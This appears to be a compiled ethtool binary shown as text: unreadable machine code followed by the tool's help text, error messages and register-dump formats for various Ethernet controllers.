D$D$DF$*D$D$D$D$,D$D$DF$*D$D$D$D$D$D$DF$q*D$D$D$D$D$D$DF$,*D$XD$D$ЁD$ȁD$DFT$L$$)D$xD$D$DF$)}F8D$D$%D$DFT$$s)D$HD$D$DF$F)DFD$D$$D$<*DFD$D$$D$*DFD$D$$D$)DFD$D$$D$)KDFD$D$$D$)DFD$D$$hD$j)FZD$dD$D$DF$ (D$D$D$DF$''UVS uF=UfDFD$D$$D$(DFD$D$$D$(Ft=11fD3D$DFVD$D$T$$H'9^w1 [^]ÉD$@FD$UfD$D$$'UWV1S1ہ}D$D$ $'DFD$
D$$D$'DFD$D$$D$'t&;_s\D\$D$D$ED$DF$T&9uáDF$
D$|';_rDF$
D$b'1[^_]ÐUVS˃ D$D$$&$N('D$8"$D$%FD$d"$D$%FD$FD$"$D$%FD$"$D$%FD$"$D$i%F4D$#$D$N%F&D$@#$D$2%F(D$F,D$l#$D$%tTFD$FD$#$D$$FD$FD$#$D$$ [^]Ðt&FD$FD$FD$#$D$$ [^]Í'USÃ$%$L%D$$$D$<$CD$8$$D$!$CD$d$$D$$CD$$$D$#CD$$$D$#CD$$$D$#[]Í&UVS1ۃD$D$$#1D$$D$-D$Y#
uЃ[^]ÍvUVSӃB(uD$D$%$#[^]ÉD$D$$"$N#$D$%$D$"CD$@%$D$"CD$l%$D$"CD$%$D$">RtXC D$t&$D$h"C$D$&$D$M"C(D$&$D$2"[^]ËCD$%$D$"CD$%$D$!CD$&$D$!CD$H&$D$!7fUSӃ$"CD$5$D$D$!C	D$&$D$CD$b![]Ít&USӃD$D$$7!$N["D$@%$D$!CD$l%$D$ CD$%$D$ CD$t&$D$ CD$&$D$ CD$&$D$ C D$'$D$l [P]vUVSD$D$T$1 D$ D$h$D$ 3D$ D$h$D$t)uFD$
D$h$D$[^]Ív'UWVS1ۃ$o Dt&\$D$$p;D$!$D$TtHރt;D$!$D$&u͡DF$
D$y uDF$
D$\ [^_]ÍUVSD$D$$DD$$T$D$u$
[^]Í&USӃD$D$$GD$H'$D$,CD$p'$D$CD$'$D$CD$'$D$CD$'$D$CD$($D$CD$8($D$S ([]t&'UVS$r$Nf$
D$`($T$D$D$($T$D$D$($D$D$($ÉD$gvD\&eD$ $dt&&&&uD$$D$$t&D$*$D$D$)$D$w[^]D$$\f
D$$;끐D$$$g&D$$GD$$.D$
$D$$UVSӃ uD$D$%$ [^]ÉD$D$$`$NC D$C$D$0)$D$2C(D$C,D$X)$D$C0D$)$D$C4D$#$D$C8D$)$D$$
D$&$D$CD$)$D$~CD$CD$*$D$\CD$"$D$ACD$"$D$&u:CD$CD$CD$#$D$ [^]Í&CD$CD$(*$D$CD$CD$#$D$ [^]ÐUWVSu^$5$JC`D$L*$D$DChD$x*$D$)ClD$*$D$*ǃ:$^D$T+$D$D$+$D$D$+$D$D$D$+$D$cD$,$D$DXD$x,$D$$wAD$,$D$D$,$D$D$,$D$D$-$D$D$8-$D$vD$\-$D$(D$-$D$
D$-$D$(sL#L
~1ɸ1ɸZ*
 
 
t`9 M g 8  V
 F1[^_]D$H,$D$CdD$*$D$CtD$*$D$CpD$(+$D$opfUWVSu^&$5a$JRC`D$L*$D$ChD$x*$D$ClD$*$D$؍(dڸH< L | 1ɸ1ɸ
 
  
 ڸ{ &1ɸ 1ɸ!9 RM Bg 2!
0!D!1[^_]ËCdD$*$D$%CtD$*$D$
CpD$(+$D$!UWVS]C{D$.D$D$.D$0.$D$st01ۍt&DD$߃D$ .$D$r9uփ1[^_]ÐUVS]DFD$D$$X.D$CD$1D$D$DF$CD$1D$D$DF$CD$1D$D$DF$CD$ 2D$D$DF$bCD$D2D$D$DF$>C D$h2D$D$DF$C$D$2D$D$DF$C(D$2D$D$DF$C,D$2D$D$DF$C0D$2D$D$DF$C4D$3D$D$DF$fC8D$@3D$D$DF$BC<D$d3D$D$DF$C@D$3D$D$DF$CDD$3D$D$DF$CHD$3D$D$DF$CLD$3D$D$DF$CPD$4D$D$DF$jCTD$<4D$D$DF$FCXD$`4D$D$DF$"C\D$4D$D$DF$
C`D$4D$D$DF$
CdD$4D$D$DF$
ChD$4D$D$DF$
ClD$5D$D$DF$n
CpD$85D$D$DF$J
DF$
D$DFD$D$$D$0CtD$k.D$D$DF$CxD$.D$D$DF$C|D$.D$D$DF$D$.D$D$DF$}D$.D$D$DF$VD$.D$D$DF$/D$/D$D$DF$D$//D$D$DF$D$K/D$D$DF$D$g/D$D$DF$D$/D$D$DF$lD$/D$D$DF$EDF$
D$DFD$D$$/D$+D$\5D$D$DF$
D$5D$D$DF$
D$5D$D$DF$
D$5D$D$DF$o
D$5D$D$DF$H
D$46D$D$DF$!
D$t6D$D$DF$	D$/D$D$DF$	D$/D$D$DF$	D$0D$D$DF$	D$0D$D$DF$^	D$;0D$D$DF$7	D$X0D$D$DF$	D$u0D$D$DF$D$0D$D$DF$D$0D$D$DF$D$6D$D$DF$tD$6D$D$DF$MD$7D$D$DF$&D$0D$D$DF$D$0D$D$DF$D$1D$D$DF$D$"1D$D$DF$D$?1D$D$DF$cD$\1D$D$DF$<D$y1D$D$DF$D$1D$D$DF$D$(7D$D$DF$D$X7D$D$DF$D$7D$D$DF$yD$7D$D$DF$RFD$7D$D$DF$.DF$
D$i1[^]ÐU]Ít&'UWVS^w E )E}Ut+1ƍED$ED$E$9}u߃[^_]Ë$ÐUS@@tЋu[]US[lY[%s unmodified, ignoring
ethtool version 6
-hDEVNAME	 ethtool %s|%s %s	%s
%soffSettings for %s:
	Supported ports: [ AUI BNC MII FIBRE ]
	Supported link modes:   10baseT/Half 10baseT/Full 	                        100baseT/Half 100baseT/Full 1000baseT/Half 1000baseT/Full 2500baseX/Full 10000baseT/Full 	Supports auto-negotiation: Yes
No
	Advertised link modes:  Not reported	Speed: Unknown!
%uMb/s
	Duplex: Half
Full
Unknown! (%i)
	Port: Twisted Pair
AUI
BNC
MII
FIBRE
	PHYAD: %d
	Transceiver: internal
external
	Auto-negotiation: %s
Cannot get device settings	Supports Wake-on: %s
	Wake-on: %s
        SecureOn password: %s%02xCannot get message levelyesno	Link detected: %s
Cannot get link statusNo data available
Cannot get driver informationCannot get register dumpCan't open '%s': %s
Offset	Values
--------	-----
%03x:	 %02xCannot dump registersCannot testCannot get stringsPASSFAILThe test result is %s
The test extra info:
%s	 %d
Cannot get control socketCannot set new settings  not setting speed
  not setting duplex
  not setting port
  not setting autoneg
  not setting phy_address
  not setting transceiver
  not setting wol
  not setting sopass
Cannot set new msglvlCannot get EEPROM datanatsemitg3Offset		Values
------		------
0x%04x		%02x Cannot set EEPROM dataCannot identify NICPause parameters for %s:
Coalesce parameters for %s:
Adaptive RX: %s  TX: %s
Ring parameters for %s:
Offload parameters for %s:
no offload info available
no offload settings changed
no stats available
no memory available
Cannot get stats informationNIC statistics:
     %.*s: %llu
onlineoffline250010000duplexhalffulltpauibncmiifibreautonegadvertisephyadxcvrinternalexternalwolsopass%2x:%2x:%2x:%2x:%2x:%2x-s--changeChange generic options-a--show-pauseShow pause options-A--pauseSet pause options-c--show-coalesceShow coalesce options-C--coalesceSet coalesce options-g--show-ringQuery RX/TX ring parameters--set-ringSet RX/TX ring parameters-k--show-offload--offloadSet protocol offload-i--driverShow driver information-d--register-dumpDo a register dump-e--eeprom-dumpDo a EEPROM dump-E--change-eepromChange bytes in device EEPROM-r--negotiateRestart N-WAY negotation-p--identify-t--testExecute adapter self test-S--statisticsShow adapter statistics--helpShow this helprawhexfileoffsetlengthmagicvaluerx-minirx-jumboadaptive-rxadaptive-txsample-intervalstats-block-usecspkt-rate-lowpkt-rate-highrx-usecsrx-framesrx-usecs-irqrx-frames-irqtx-usecstx-framestx-usecs-irqtx-frames-irqrx-usecs-lowrx-frames-lowtx-usecs-lowtx-frames-lowrx-usecs-highrx-frames-hightx-usecs-hightx-frames-highsgtsoufogsogro8139cp8139toor8169de2104xe1000ixgbe100amd8111epcnet32fec_8xxibm_emacskgesky2viocsmsc911xUsage:
ethtool DEVNAME	Display standard information about device
                               	Advertised auto-negotiation: Cannot get wake-on-lan settings	Current message level: 0x%08x (%d)
Cannot allocate memory for register dumpCannot allocate memory for test infoCannot allocate memory for stringsdriver: %s
version: %s
firmware-version: %s
bus-info: %s
Cannot get current device settingsCannot get current wake-on-lan settingsCannot set new wake-on-lan settingsCannot restart autonegotiationCannot allocate memory for EEPROM dataAutonegotiate:	%s
RX:		%s
TX:		%s
Cannot get device pause settingsno pause parameters changed, aborting
Cannot set device pause parametersstats-block-usecs: %u
sample-interval: %u
pkt-rate-low: %u
pkt-rate-high: %u

rx-usecs: %u
rx-frames: %u
rx-usecs-irq: %u
rx-frames-irq: %u

tx-usecs: %u
tx-frames: %u
tx-usecs-irq: %u
tx-frames-irq: %u

rx-usecs-low: %u
rx-frame-low: %u
tx-usecs-low: %u
tx-frame-low: %u

rx-usecs-high: %u
rx-frame-high: %u
tx-usecs-high: %u
tx-frame-high: %u

Cannot get device coalesce settingsno ring parameters changed, aborting
Cannot set device ring parametersPre-set maximums:
RX:		%u
RX Mini:	%u
RX Jumbo:	%u
TX:		%u
Current hardware settings:
RX:		%u
RX Mini:	%u
RX Jumbo:	%u
TX:		%u
Cannot get device ring settingsCannot get device rx csum settingsCannot get device tx csum settingsCannot get device scatter-gather settingsCannot get device tcp segmentation offload settingsCannot get device udp large send offload settingsCannot get device generic segmentation offload settingsCannot get device GRO settingsrx-checksumming: %s
tx-checksumming: %s
scatter-gather: %s
tcp segmentation offload: %s
udp fragmentation offload: %s
generic segmentation offload: %s
generic-receive-offload: %s
Cannot set device rx csum settingsCannot set device tx csum settingsCannot set device scatter-gather settingsCannot set device tcp segmentation offload settingsCannot set device udp large send offload settingsCannot set device generic segmentation offload settingsCannot set device GRO settingsCannot get stats strings information		[ speed 10|100|1000|2500|10000 ]
		[ duplex half|full ]
		[ port tp|aui|bnc|mii|fibre ]
		[ autoneg on|off ]
		[ advertise %%x ]
		[ phyad %%d ]
		[ xcvr internal|external ]
		[ wol p|u|m|b|a|g|s|d... ]
		[ sopass %%x:%%x:%%x:%%x:%%x:%%x ]
		[ msglvl %%d ] 
		[ autoneg on|off ]
		[ rx on|off ]
		[ tx on|off ]
		[adaptive-rx on|off]
		[adaptive-tx on|off]
		[rx-usecs N]
		[rx-frames N]
		[rx-usecs-irq N]
		[rx-frames-irq N]
		[tx-usecs N]
		[tx-frames N]
		[tx-usecs-irq N]
		[tx-frames-irq N]
		[stats-block-usecs N]
		[pkt-rate-low N]
		[rx-usecs-low N]
		[rx-frames-low N]
		[tx-usecs-low N]
		[tx-frames-low N]
		[pkt-rate-high N]
		[rx-usecs-high N]
		[rx-frames-high N]
		[tx-usecs-high N]
		[tx-frames-high N]
		[sample-interval N]
		[ rx N ]
		[ rx-mini N ]
		[ rx-jumbo N ]
		[ tx N ]
Get protocol offload information		[ rx on|off ]
		[ tx on|off ]
		[ sg on|off ]
		[ tso on|off ]
		[ ufo on|off ]
		[ gso on|off ]
		[ gro on|off ]
		[ raw on|off ]
		[ file FILENAME ]
		[ raw on|off ]
		[ offset N ]
		[ length N ]
		[ magic N ]
		[ offset N ]
		[ value N ]
Show visible port identification (e.g. blinking)               [ TIME-IN-SECONDS ]
               [ online | offline ]
Gqɜv̉ω؉	
/2BX[fė{~
tˊΊ݊Й #3HFIWphk{ċ̚ϋҋً$؂"`P`P`P
ōʍӍ<ۍ`s`ovvDescriptor Registers
Command Registers
StoppedEnabledDisabledYesNoInterrupt Registers
Link status Register
10Mbits/ Sec100Mbits/SecHalfValidInvalid0x00100: Transmit descriptor base address register %08X
0x00140: Transmit descriptor length register 0x%08X
0x00120: Receive descriptor base address register %08X
0x00150: Receive descriptor length register 0x%08X
0x00048: Command 0 register  0x%08X
	Interrupts:				%s
	Device:					%s
0x00050: Command 2 register  0x%08X
	Promiscuous mode:			%s
	Retransmit on underflow:		%s
0x00054: Command 3 register  0x%08X
	Jumbo frame:				%s
	Admit only VLAN frame:	 		%s
	Delete VLAN tag:			%s
0x00064: Command 7 register  0x%08X
0x00038: Interrupt register  0x%08X
	Any interrupt is set: 			%s
	Link change interrupt:	  		%s
	Register 0 auto-poll interrupt:		%s
	Transmit interrupt:			%s
	Software timer interrupt:		%s
	Receive interrupt:			%s
0x00040: Interrupt enable register  0x%08X
	Link change interrupt:	  		%s
	Register 0 auto-poll interrupt:		%s
	Transmit interrupt:			%s
	Software timer interrupt:		%s
	Receive interrupt:			%s
Logical Address Filter Register
0x00168: Logical address filter register  0x%08X%08X
0x00030: Link status register  0x%08X
	Link status:	  		%s
	Auto negotiation complete	%s
	Duplex				%s
	Speed				%s
0x00030: Link status register  0x%08X
	Link status:	  		%s
0x40: CSR8 (Missed Frames Counter)       0x%08x
0x18: CSR3 (Rx Ring Base Address)        0x%08x
0x20: CSR4 (Tx Ring Base Address)        0x%08x
0x00: CSR0 (Bus Mode)                    0x%08x
      %s
      %s address space
      Cache alignment: %s
      Programmable burst length unlimited
      Programmable burst length %d longwords
      %s endian data buffers
      Descriptor skip length %d longwords
      %s bus arbitration scheme
      Software reset asserted
0x28: CSR5 (Status)                      0x%08x
%s      Transmit process %s
      Receive process %s
      Link %s
      Normal interrupts: %s%s%s
      Abnormal intr: %s%s%s%s%s%s%s%s
      Start/Stop Backoff Counter
      Flaky oscillator disable
0x30: CSR6 (Operating Mode)              0x%08x
%s%s      Transmit threshold %d bytes
      Transmit DMA %sabled
%s      Operating mode: %s
      %s duplex
%s%s%s%s%s%s%s      Receive DMA %sabled
      %s filtering mode
      Transmit buffer unavailable
      Transmit jabber timeout
      Receive buffer unavailable
      Receive watchdog timeout
      Abnormal interrupt summary
      Normal interrupt summary
0x38: CSR7 (Interrupt Mask)              0x%08x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s0x48: CSR9 (Ethernet Address ROM)        0x%08x
0x58: CSR11 (Full Duplex Autoconfig)     0x%08x
      Network connection error
0x60: CSR12 (SIA Status)                 0x%08x
%s%s%s%s%s%s%s      AUI_TP pin: %s
      AUI_TP pin autoconfiguration
      SIA PLL external input enable
      Encoder input multiplexer
      Serial interface input multiplexer
0x68: CSR13 (SIA Connectivity)           0x%08x
%s%s%s%s      External port output multiplexer select: %u%u%u%u
%s%s%s%s      %s interface selected
%s%s%s      Collision squelch enable
      Collision detect enable
0x70: CSR14 (SIA Transmit and Receive)   0x%08x
%s%s%s%s%s%s%s      %s
%s%s%s%s      Receive watchdog disable
      Receive watchdog release
0x78: CSR15 (SIA General)                0x%08x
%s%s%s%s%s%s%s%s%s%s0x00: CSR0 (Bus Mode)                    0x%08x
      %s endian descriptors
      %s
      %s address space
      Cache alignment: %s
      Normal interrupts: %s%s%s%s%s
      Abnormal intr: %s%s%s%s%s%s%s
      Special capture effect enabled
      Early receive interrupt
0x38: CSR7 (Interrupt Mask)              0x%08x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s0x48: CSR9 (Boot and Ethernet ROMs)      0x%08x
      Select bits: %s%s%s%s%s%s
      Data: %d%d%d%d%d%d%d%d
0x50: CSR10 (Boot ROM Address)           0x%08x
0x58: CSR11 (General Purpose Timer)      0x%08x
%s      Timer value: %u cycles
      Selected port receive activity
      Non-selected port receive activity
      Link partner negotiable
0x60: CSR12 (SIA Status)                 0x%08x
      Link partner code word 0x%04x
%s      NWay state: %s
%s%s%s%s%s%s%s%s%s%s%s      SIA register reset asserted
      CSR autoconfiguration enabled
0x68: CSR13 (SIA Connectivity)           0x%08x
      SIA Diagnostic Mode 0x%04x
      %s
%s%s      10base-T/AUI autosensing
0x70: CSR14 (SIA Transmit and Receive)   0x%08x
%s%s%s%s%s%s%s%s%s%s      %s
%s%s%s%s0x78: CSR15 (SIA General)                0x%08x
%s%s%s%s%s%s%s%s%s%s%s%s      %s port selected
%s%s%s16-longword boundary alignment32-longword boundary alignmentTransmit automatic polling every 200 secondsTransmit automatic polling every 800 secondsTransmit automatic polling every 1.6 milliseconds      Bus error: (unknown code, reserved)      Counter overflow
      No missed frames
      %u missed frames
21040 Registers
DiagnosticStandardRound-robinRX-has-priorityBigLittlefailRxOKTxNoBufs TxOK FD_Short AUI_TP RxTimeout RxStopped RxNoBufs TxUnder TxJabber TxStop HashPerfectendis      Hash-only Filtering
      Pass Bad Frames
      Inverse Filtering
      Promisc Mode
      Pass All Multicast
      Forcing collisions
      Back pressure enabled
      Capture effect enabled
      Transmit interrupt
      Transmit stopped
      Transmit underflow
      Receive interrupt
      Receive stopped
      AUI_TP pin
      Full duplex
      Link fail
      System error
AUITP      Autopolarity state
      PLL self-test done
      PLL self-test pass
      PLL sampler low
      PLL sampler high
      SIA reset
      CSR autoconfiguration
10base-T      APLL start
      Input enable
      Enable pins 1, 3
      Enable pins 2, 4
      Enable pins 5, 6, 7
      Encoder enable
      Loopback enable
      Driver enable
      Link pulse send enable
      Receive squelch enable
      Heartbeat enable
      Link test enable
      Autopolarity enable
      Set polarity plus
      Jabber disable
      Host unjab
      Jabber clock
      Test clock
      Force unsquelch
      Force link fail
      PLL self-test start
      Force receiver low
21041 Registers
EarlyRx TimerExp ANC       Link pass
      Timer expired
ExtReg SROM BootROM Read Mode       Continuous mode
      Unstable NLP detected
      Transmit remote fault
AUI/BNC port10base-T port      Must Be One
      Autonegotiation enable
BNC      GP LED1 enable
      GP LED1 on
      LED stretch disable
      GP LED2 enable
      GP LED2 on
not used8-longword boundary alignmentNo transmit automatic pollingstoppedrunning: fetch descrunning: chk pkt endrunning: wait for pktsuspendedrunning: closerunning: flushrunning: queuerunning: wait xmit endrunning: read bufunknown (reserved)running: setup packetrunning: close desc      Bus error: parity      Bus error: master abort      Bus error: target abortnormalinternal loopbackexternal loopbackunknown (not used)Compensation Disabled ModeHigh Power ModeNormal Compensation ModeAutonegotiation disableTransmit disableAbility detectAcknowledge detectComplete acknowledgeFLP link good, nway completeLink check2;TtYİwȸ׸w1G[s(((((ȹڹH`1IZi|SCB Status Word (Lower Word)             0x%04X
      RU Status:               Idle
      RU Status:               Suspended
      RU Status:               No Resources
      RU Status:               Ready
      RU Status:               Suspended with no more RBDs
      RU Status:               No Resources due to no more RBDs
      RU Status:               Ready with no RBDs present
      RU Status:               Unknown State
      CU Status:               Idle
      CU Status:               Suspended
      CU Status:              Active
      CU Status:               Unknown State
      ---- Interrupts Pending ----
      Flow Control Pause:                %s
      Early Receive:                     %s
      Software Generated Interrupt:      %s
      MDI Done:                          %s
      RU Not In Ready State:             %s
      CU Not in Active State:            %s
      RU Received Frame:                 %s
      CU Completed Command:              %s
SCB Command Word (Upper Word)            0x%04X
      RU Command:              No Command
      RU Command:              RU Start
      RU Command:              RU Resume
      RU Command:              RU Abort
      RU Command:              Load RU Base
      RU Command:              Unknown
      CU Command:              No Command
      CU Command:              CU Start
      CU Command:              CU Resume
      CU Command:              Load Dump Counters Address
      CU Command:              Dump Counters
      CU Command:              Load CU Base
      CU Command:              Dump & Reset Counters
      CU Command:              Unknown
      Software Generated Interrupt:      %s
      ---- Interrupts Masked ----
      ALL Interrupts:                    %s
      Flow Control Pause:                %s
      Early Receive:                     %s
      RU Not In Ready State:             %s
      CU Not in Active State:            %s
      RU Received Frame:                 %s
      CU Completed Command:              %s
MDI/MDI-X Status:                        MDI
MDI-X
Unknown
t>hpF@BlMAC Registers
enableddisabledresetbiglittle10Mb/s100Mb/s1000Mb/sno link configPCI Express64-bit32-bit100MHz66MHz133MHzPCI-Xdon't passignoredfilteredacceptignore1/21/41/8reserved163848192409620481024512256M88IGPIGP2unknownPCI0x00000: CTRL (Device control register)  0x%08X
      Endian mode (buffers):             %s
      Link reset:                        %s
      Set link up:                       %s
      Invert Loss-Of-Signal:             %s
      Receive flow control:              %s
      Transmit flow control:             %s
      VLAN mode:                         %s
      Auto speed detect:                 %s
      Speed select:                      %s
      Force speed:                       %s
      Force duplex:                      %s
0x00008: STATUS (Device status register) 0x%08X
      Duplex:                            %s
      Link up:                           %s
      TBI mode:                          %s
      Link speed:                        %s
      Bus type:                          %s
      Port number:                       %s
      TBI mode:                          %s
      Link speed:                        %s
      Bus type:                          %s
      Bus speed:                         %s
      Bus width:                         %s
0x00100: RCTL (Receive control register) 0x%08X
      Receiver:                          %s
      Store bad packets:                 %s
      Unicast promiscuous:               %s
      Multicast promiscuous:             %s
      Long packet:                       %s
      Descriptor minimum threshold size: %s
      Broadcast accept mode:             %s
      VLAN filter:                       %s
      Canonical form indicator:          %s
      Discard pause frames:              %s
      Pass MAC control frames:           %s
      Receive buffer size:               %s
0x02808: RDLEN (Receive desc length)     0x%08X
0x02810: RDH   (Receive desc head)       0x%08X
0x02818: RDT   (Receive desc tail)       0x%08X
0x02820: RDTR  (Receive delay timer)     0x%08X
0x00400: TCTL (Transmit ctrl register)   0x%08X
      Transmitter:                       %s
      Pad short packets:                 %s
      Software XOFF Transmission:        %s
      Re-transmit on late collision:     %s
0x03808: TDLEN (Transmit desc length)    0x%08X
0x03810: TDH   (Transmit desc head)      0x%08X
0x03818: TDT   (Transmit desc tail)      0x%08X
0x03820: TIDV  (Transmit delay timer)    0x%08X
PHY type:                                %s
UEEEE55&&&eeeeuueueaddr_low0x%04lx: %-16s 0x%08x
addr_highhash_table_highhash_table_lowr_des_startx_des_startr_buff_sizeecntrlieventimaskivecr_des_activex_des_activemii_datamii_speedr_boundr_fstartx_fstartfun_coder_cntrlr_hashx_cntrlMAL%d Registers
TX|
   CTP%d = 0x%08x 
RX|RCBS%d = 0x%08x (%d) EMAC%d Registers
 IPCR = 0x%08x

ZMII%d Registers
RGMII%d Registers
FER    = %08x SSR = %08x

TAH%d Registers
CFG = 0x%08x ESR = 0x%08x IER = 0x%08x
TX|CASR = 0x%08x CARR = 0x%08x EOBISR = 0x%08x DEIR = 0x%08x
RX|CASR = 0x%08x CARR = 0x%08x EOBISR = 0x%08x DEIR = 0x%08x
MR0   = 0x%08x MR1  = 0x%08x RMR = 0x%08x
ISR   = 0x%08x ISER = 0x%08x
TMR0  = 0x%08x TMR1 = 0x%08x
TRTR  = 0x%08x RWMR = 0x%08x
IAR   = %04x%08x
LSA   = %04x%08x
IAHT  = 0x%04x 0x%04x 0x%04x 0x%04x
GAHT  = 0x%04x 0x%04x 0x%04x 0x%04x
VTPID = 0x%04x VTCI = 0x%04x
IPGVR = 0x%04x STACR = 0x%08x
OCTX  = 0x%08x OCRX = 0x%08x
FER    = %08x SSR = %08x
SMIISR = %08x

REVID = %08x MR = %08x TSR = %08x
SSR0  = %08x SSR1 = %08x SSR2 = %08x
SSR3  = %08x SSR4 = %08x SSR5 = %08x

0x00000: CTRL0 (Device control register) 0x%08X
      Link reset:                        %s
      VLAN mode:                         %s
0x00010: STATUS (Device status register) 0x%08X
      Link up:                           %s
      Bus type:                          %s
      Bus speed:                         %s
      Bus width:                         %s
0x00100: RCTL (Receive control register) 0x%08X
      Receiver:                          %s
      Store bad packets:                 %s
      Unicast promiscuous:               %s
      Multicast promiscuous:             %s
      Descriptor minimum threshold size: %s
      Broadcast accept mode:             %s
      VLAN filter:                       %s
      Cononical form indicator:          %s
0x00120: RDLEN (Receive desc length)     0x%08X
0x00128: RDH   (Receive desc head)       0x%08X
0x00130: RDT   (Receive desc tail)       0x%08X
0x00138: RDTR  (Receive delay timer)     0x%08X
0x00600: TCTL (Transmit ctrl register)   0x%08X
      Transmitter:                       %s
0x00610: TDLEN (Transmit desc length)    0x%08X
0x00618: TDH   (Transmit desc head)      0x%08X
0x00620: TDT   (Transmit desc tail)      0x%08X
0x00628: TIDV  (Transmit delay timer)    0x%08X
      %s Interrupt: %s
Address	Data
-------	------
0x%02x   	0x%04x
Mac/BIU Registers
Active      Reset In Progress
UpDownReversedNormalNot DoneNot Half/Full10/100AdvertiseIn ProgressFailedPassedRx CompleteRx DescriptorRx Packet ErrorRx Early ThresholdRx IdleRx OverrunTx Packet OKTx DescriptorTx Packet ErrorTx IdleTx UnderrunMIB ServiceSoftwarePower Management EventPhyHigh Bits ErrorRx Status FIFO OverrunReceived Target AbortReceived Master AbortSignaled System ErrorDetected Parity ErrorRx Reset CompleteTx Reset Complete      No Interrupts Active
Masked      Interrupts %s
AcceptedRejected      Wake on Arp Enabled
      SecureOn Hack Detected
      Phy Interrupt Received
      Arp Received
      Pattern 0 Received
      Pattern 1 Received
      Pattern 2 Received
      Pattern 3 Received
      Magic Packet Received
      Counters Frozen
      Value = %d
Internal Phy Registers
----------------------
      Port Isolated
      Loopback Enabled
      Remote Fault Detected
      Advertising 100Base-T4
      Advertising Pause
      Next Page Desired
      Supports 100Base-T4
      Supports Pause
      Indicates Remote Fault
Reverse      MII Interrupt Detected
      False Carrier Detected
      Rx Error Detected
      MII Interrupts %s
      MII Interrupt Pending
BypassedFree-RunningPhase-AdjustedForcedEnhancedReducedFailed or Not Run'Magic' Phy Registers
ForceDetectedMagic number 0x%08x does not match 0x%08x
0x00: CR (Command):                      0x%08x
      Transmit %s
      Receive %s
0x04: CFG (Configuration):               0x%08x
      %s Endian
      Boot ROM %s
      Internal Phy %s
      Phy Reset %s
      External Phy %s
      Default Auto-Negotiation %s, %s %s Mb %s Duplex
      Phy Interrupt %sAuto-Cleared
      Phy Configuration = 0x%02x
      Auto-Negotiation %s
      %s Polarity
      %s Duplex
      %d Mb/s
      Link %s
0x08: MEAR (EEPROM Access):              0x%08x
0x0c: PTSCR (PCI Test Control):          0x%08x
      EEPROM Self Test %s
      Rx Filter Self Test %s
      Tx FIFO Self Test %s
      Rx FIFO Self Test %s
      EEPROM Reload In Progress
0x10: ISR (Interrupt Status):            0x%08x
0x14: IMR (Interrupt Mask):              0x%08x
0x18: IER (Interrupt Enable):            0x%08x
0x20: TXDP (Tx Descriptor Pointer):      0x%08x
0x24: TXCFG (Tx Config):                 0x%08x
      Drain Threshhold = %d bytes (%d)
      Fill Threshhold = %d bytes (%d)
      Max DMA Burst per Tx = %d bytes
      Automatic Tx Padding %s
      Mac Loopback %s
      Heartbeat Ignore %s
      Carrier Sense Ignore %s
0x30: RXDP (Rx Descriptor Pointer):      0x%08x
0x34: RXCFG (Rx Config):                 0x%08x
      Drain Threshhold = %d bytes (%d)
      Max DMA Burst per Rx = %d bytes
      Long Packets %s
      Tx Packets %s
      Runt Packets %s
      Error Packets %s
0x3c: CCSR (CLKRUN Control/Status):      0x%08x
      CLKRUNN %s
      Power Management %s
      Power Management Event Pending
0x40: WCSR (Wake-on-LAN Control/Status): 0x%08x
      Wake on Phy Interrupt Enabled
      Wake on Unicast Packet Enabled
      Wake on Multicast Packet Enabled
      Wake on Broadcast Packet Enabled
      Wake on Pattern 0 Match Enabled
      Wake on Pattern 1 Match Enabled
      Wake on Pattern 2 Match Enabled
      Wake on Pattern 3 Match Enabled
      Wake on Magic Packet Enabled
      Magic Packet SecureOn Enabled
      Unicast Packet Received
      Multicast Packet Received
      Broadcast Packet Received
0x44: PCR (Pause Control/Status):        0x%08x
      Pause Counter = %d
      Pause %sNegotiated
      Pause on DA %s
      Pause on Mulitcast %s
      Pause %s
      PS_RCVD: Pause Frame Received
0x48: RFCR (Rx Filter Control):          0x%08x
      Unicast Hash %s
      Multicast Hash %s
      Arp %s
      Pattern 0 Match %s
      Pattern 1 Match %s
      Pattern 2 Match %s
      Pattern 3 Match %s
      Perfect Match %s
      All Unicast %s
      All Multicast %s
      All Broadcast %s
      Rx Filter %s
0x4c: RFDR (Rx Filter Data):             0x%08x
      PMATCH 1-0 = 0x%08x
      PMATCH 3-2 = 0x%08x
      PMATCH 5-4 = 0x%08x
      PCOUNT 1-0 = 0x%08x
      PCOUNT 3-2 = 0x%08x
      SOPASS 1-0 = 0x%08x
      SOPASS 3-2 = 0x%08x
      SOPASS 5-4 = 0x%08x
0x50: BRAR (Boot ROM Address):           0x%08x
      Automatically Increment Address
0x54: BRDR (Boot ROM Data):              0x%08x
0x58: SRR (Silicon Revision):            0x%08x
0x5c: MIBC (Mgmt Info Base Control):     0x%08x
      Counter Overflow Warning
0x60: MIB[0] (Rx Errored Packets):       0x%04x
0x64: MIB[1] (Rx Frame Sequence Errors): 0x%02x
0x68: MIB[2] (Rx Missed Packets):        0x%02x
0x6c: MIB[3] (Rx Alignment Errors):      0x%02x
0x70: MIB[4] (Rx Symbol Errors):         0x%02x
0x74: MIB[5] (Rx Long Frame Errors):     0x%02x
0x78: MIB[6] (Tx Heartbeat Errors):      0x%02x
0x80: BMCR (Basic Mode Control):         0x%04x
      %s Duplex
      Port is Powered %s
      Auto-Negotiation %s
      %d Mb/s
      Auto-Negotiation Restarting
0x84: BMSR (Basic Mode Status):          0x%04x
      Link %s
      %sCapable of Auto-Negotiation
      Auto-Negotiation %sComplete
      %sCapable of Preamble Suppression
      %sCapable of 10Base-T Half Duplex
      %sCapable of 10Base-T Full Duplex
      %sCapable of 100Base-TX Half Duplex
      %sCapable of 100Base-TX Full Duplex
      %sCapable of 100Base-T4
      Jabber Condition Detected
0x88: PHYIDR1 (PHY ID #1):               0x%04x
0x8c: PHYIDR2 (PHY ID #2):               0x%04x
      OUI = 0x%06x
      Model = 0x%02x (%d)
      Revision = 0x%01x (%d)
0x90: ANAR (Autoneg Advertising):        0x%04x
      Protocol Selector = 0x%02x (%d)
      Advertising 10Base-T Half Duplex
      Advertising 10Base-T Full Duplex
      Advertising 100Base-TX Half Duplex
      Advertising 100Base-TX Full Duplex
      Indicating Remote Fault
0x94: ANLPAR (Autoneg Partner):          0x%04x
      Supports 10Base-T Half Duplex
      Supports 10Base-T Full Duplex
      Supports 100Base-TX Half Duplex
      Supports 100Base-TX Full Duplex
      Indicates Acknowledgement
0x98: ANER (Autoneg Expansion):          0x%04x
      Link Partner Can %sAuto-Negotiate
      Link Code Word %sReceived
      Next Page %sSupported
      Link Partner Next Page %sSupported
      Parallel Detection Fault
